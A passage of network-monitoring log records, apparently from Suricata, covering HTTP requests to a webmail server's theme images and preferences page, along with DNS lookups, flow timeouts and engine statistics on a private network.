Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":515},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/plus-sidebar.png","state":"CLOSED","stored":false,"size":515,"tx_id":8}} {"timestamp":"2020-02-29T00:03:09.265133+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":9,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227}} {"timestamp":"2020-02-29T00:03:09.267064+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/collapse.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":227},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/collapse.png","state":"CLOSED","stored":false,"size":227,"tx_id":9}} {"timestamp":"2020-02-29T00:03:09.268635+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":10,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux 
x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220}} {"timestamp":"2020-02-29T00:03:09.270134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/edit-sidebar-fff.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":220},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/edit-sidebar-fff.png","state":"CLOSED","stored":false,"size":220,"tx_id":10}} {"timestamp":"2020-02-29T00:03:09.272134+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":11,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477}} {"timestamp":"2020-02-29T00:03:09.273149+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/checkbox_on.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":477},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/checkbox_on.png","state":"CLOSED","stored":false,"size":477,"tx_id":11}} {"timestamp":"2020-02-29T00:03:09.297306+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52670,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386}} {"timestamp":"2020-02-29T00:03:09.317382+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":12,"http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234}} {"timestamp":"2020-02-29T00:03:09.333736+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/expand.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":234},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/expand.png","state":"CLOSED","stored":false,"size":234,"tx_id":12}} {"timestamp":"2020-02-29T00:03:09.334195+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":52668,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":13,"http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742}} {"timestamp":"2020-02-29T00:03:12.486743+0000","flow_id":1392564397028430,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34716,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php?app=imp&group=delmove","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":5173},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21411,"tx_id":1}} {"timestamp":"2020-02-29T00:03:14.258675+0000","flow_id":1169518155910251,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52670,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/themes\/default\/graphics\/data.png","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"image\/png","http_refer":"http:\/\/mail.spiral.com\/themes\/default\/screen.css","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":386},"app_proto":"http","fileinfo":{"filename":"\/themes\/default\/graphics\/data.png","state":"CLOSED","stored":false,"size":386,"tx_id":2}} {"timestamp":"2020-02-29T00:03:14.339998+0000","flow_id":1452797018606239,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":52668,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/nag\/themes\/default\/graphics\/favicon.ico","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"image\/vnd.microsoft.icon","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1742},"app_proto":"http","fileinfo":{"filename":"\/nag\/themes\/default\/graphics\/favicon.ico","state":"CLOSED","stored":false,"size":1742,"tx_id":13}} {"timestamp":"2020-02-29T00:03:16.000265+0000","event_type":"stats","stats":{"uptime":13848,"capture":{"kernel_packets":132906,"kernel_drops":0},"decoder":{"pkts":132909,"bytes":92153610,"invalid":180,"ipv4":131476,"ipv6":8,"ethernet":132909,"raw":0,"null":0,"sll":0,"tcp":126450,"udp":4832,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7099360},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2682,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2698,"synack":2689,"rst":1194,"segment_memcap_drop":0,"stream_dep
th_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1727,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2202,"failed_udp":108},"tx":{"http":4490,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2279}},"flow_mgr":{"closed_pruned":2654,"new_pruned":15,"est_pruned":2245,"bypassed_pruned":0,"flows_checked":1,"flows_notimeout":1,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65535,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21823,"memcap_state":0,"memcap_global":0},"http":{"memuse":47133,"memcap":0}}} {"timestamp":"2020-02-29T00:03:17.000187+0000","flow_id":148780504013802,"event_type":"flow","src_ip":"192.168.10.122","src_port":56194,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:15.941034+0000","end":"2020-02-28T23:58:16.052379+0000","age":1,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:20.456707+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":35466,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":16659,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} 
{"timestamp":"2020-02-29T00:03:20.562100+0000","flow_id":97464254789635,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":35466,"proto":"UDP","dns":{"type":"answer","id":16659,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:20.685840+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:20.701894+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34718,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267}} 
{"timestamp":"2020-02-29T00:03:21.000204+0000","flow_id":1408258204220712,"event_type":"flow","src_ip":"192.168.10.81","src_port":52654,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":20,"pkts_toclient":20,"bytes_toserver":5143,"bytes_toclient":14597,"start":"2020-02-29T00:02:11.900392+0000","end":"2020-02-29T00:02:20.574550+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000418+0000","flow_id":872675782682226,"event_type":"flow","src_ip":"192.168.10.81","src_port":52658,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":843,"bytes_toclient":1539,"start":"2020-02-29T00:02:15.452210+0000","end":"2020-02-29T00:02:20.466510+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:21.000519+0000","flow_id":1477475882025965,"event_type":"flow","src_ip":"192.168.10.122","src_port":45481,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:20.115693+0000","end":"2020-02-28T23:58:20.227236+0000","age":0,"state":"established","reason":"timeout","alerted":false}} 
{"timestamp":"2020-02-29T00:03:21.000682+0000","flow_id":246860392947698,"event_type":"flow","src_ip":"192.168.10.81","src_port":52656,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":12,"pkts_toclient":11,"bytes_toserver":2743,"bytes_toclient":7902,"start":"2020-02-29T00:02:15.450546+0000","end":"2020-02-29T00:02:20.574521+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:23.000217+0000","event_type":"stats","stats":{"uptime":13855,"capture":{"kernel_packets":132918,"kernel_drops":0},"decoder":{"pkts":132932,"bytes":92161692,"invalid":180,"ipv4":131499,"ipv6":8,"ethernet":132932,"raw":0,"null":0,"sll":0,"tcp":126471,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10004,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098496},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2657,"new_pruned":15,"est_pruned":2247,"bypas
sed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":0,"flows_removed":4,"rows_checked":65536,"rows_skipped":65530,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102937,"memcap":0}}} {"timestamp":"2020-02-29T00:03:25.000544+0000","flow_id":359534564994154,"event_type":"flow","src_ip":"192.168.10.81","src_port":52660,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":19,"pkts_toclient":21,"bytes_toserver":4143,"bytes_toclient":20807,"start":"2020-02-29T00:02:15.453738+0000","end":"2020-02-29T00:02:24.404757+0000","age":9,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:25.702845+0000","flow_id":1755149832342807,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34718,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php?app=imp&group=delmove","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5267},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} 
{"timestamp":"2020-02-29T00:03:29.000556+0000","flow_id":2170112373483042,"event_type":"flow","src_ip":"192.168.10.122","src_port":56279,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":87,"bytes_toclient":142,"start":"2020-02-28T23:58:28.583202+0000","end":"2020-02-28T23:58:28.694600+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:03:30.000154+0000","event_type":"stats","stats":{"uptime":13862,"capture":{"kernel_packets":132932,"kernel_drops":0},"decoder":{"pkts":132935,"bytes":92161890,"invalid":180,"ipv4":131502,"ipv6":8,"ethernet":132935,"raw":0,"null":0,"sll":0,"tcp":126474,"udp":4834,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7098208},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2683,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2699,"synack":2690,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1728,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":100,"dcerpc_udp":0,"dns_udp":2203,"failed_udp":108},"tx":{"http":4491,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2280}},"flow_mgr":{"closed_pruned":2658,"new_pruned":15,"est_pruned":2247,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked"
:65536,"rows_skipped":65536,"rows_empty":0,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21161,"memcap_state":0,"memcap_global":0},"http":{"memuse":46893,"memcap":0}}} {"timestamp":"2020-02-29T00:03:30.001254+0000","flow_id":1530510154133066,"event_type":"flow","src_ip":"192.168.10.130","src_port":34700,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":7,"pkts_toclient":9,"bytes_toserver":1030,"bytes_toclient":7104,"start":"2020-02-29T00:02:23.847434+0000","end":"2020-02-29T00:02:29.118708+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:32.247963+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":46479,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":36024,"rrname":"130.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"130.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:03:32.359559+0000","flow_id":282835044059291,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":46479,"proto":"UDP","dns":{"type":"answer","id":36024,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:03:32.520894+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; 
Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":20},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":197,"tx_id":0}} {"timestamp":"2020-02-29T00:03:32.537272+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.130","src_port":34720,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269}} {"timestamp":"2020-02-29T00:03:33.000689+0000","flow_id":950942972546480,"event_type":"flow","src_ip":"192.168.10.81","src_port":52662,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"failed","app_proto_tc":"http","flow":{"pkts_toserver":5,"pkts_toclient":5,"bytes_toserver":314,"bytes_toclient":817,"start":"2020-02-29T00:02:28.560560+0000","end":"2020-02-29T00:02:28.994268+0000","age":0,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"17","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:34.000485+0000","flow_id":1466343343045982,"event_type":"flow","src_ip":"192.168.10.81","src_port":52666,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","flow":{"pkts_toserver":4,"pkts_toclient":2,"bytes_toserver":272,"bytes_toclient":140,"start":"2020-02-29T00:02:28.572766+0000","end":"2020-02-29T00:02:33.574149+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"13","tcp_flags_ts":"13","tcp_flags_tc":"13","syn":true,"fin":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:03:34.000756+0000","flow_id":1520949557243714,"event_type":"flow","src_ip":"192.168.10.81","src_port":52664,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":8,"pkts_toclient":7,"bytes_toserver":1395,"bytes_toclient":2845,"start":"2020-02-29T00:02:28.569154+0000","end":"2020-02-29T00:02:33.575181+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:03:37.000214+0000","event_type":"stats","stats":{"uptime":13869,"capture":{"kernel_packets":132938,"kernel_drops":0},"decoder":{"pkts":132952,"bytes":92169556,"invalid":180,"ipv4":131519,"ipv6":8,"ethernet":132952,"raw":0,"null":0,"sll":0,"tcp":126489,"udp":4836,"sctp":0,"icmpv4":14,"icmpv6":8,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":693,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7097344},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2684,"ssn_memcap_drop":0,"pseudo":339,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2700,"synack":2691,"rst":1194,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":138,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":24},"app_layer":{"flow":{"http":1729,"ftp":0,"smtp":0,"tls":761,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":101,"dcerpc_udp":0,"dns_udp":2204,"failed_udp":108},"tx":{"http":4492,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2281}},"flow_mgr":{"closed_pruned":2662,"new_pruned":15,"est_pruned":2248,"bypassed_pruned":0,"flows_checked":0,"flows_notimeout":0,"flows_timeout":0,"flows_timeout_inuse":0,"flows_removed":0,"rows_checked":65536,"rows_skipped":65534,"rows_empty":2,"rows_busy":0,"rows_maxlen":0},"dns":{"memuse":21492,"memcap_state":0,"memcap_global":0},"http":{"memuse":102755,"memcap":0}}} 
{"timestamp":"2020-02-29T00:03:37.538019+0000","flow_id":686372991301585,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.130","dest_port":34720,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/prefs.php","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":5269},"app_proto":"http","fileinfo":{"filename":"\/services\/prefs.php","state":"CLOSED","stored":false,"size":21565,"tx_id":0}} 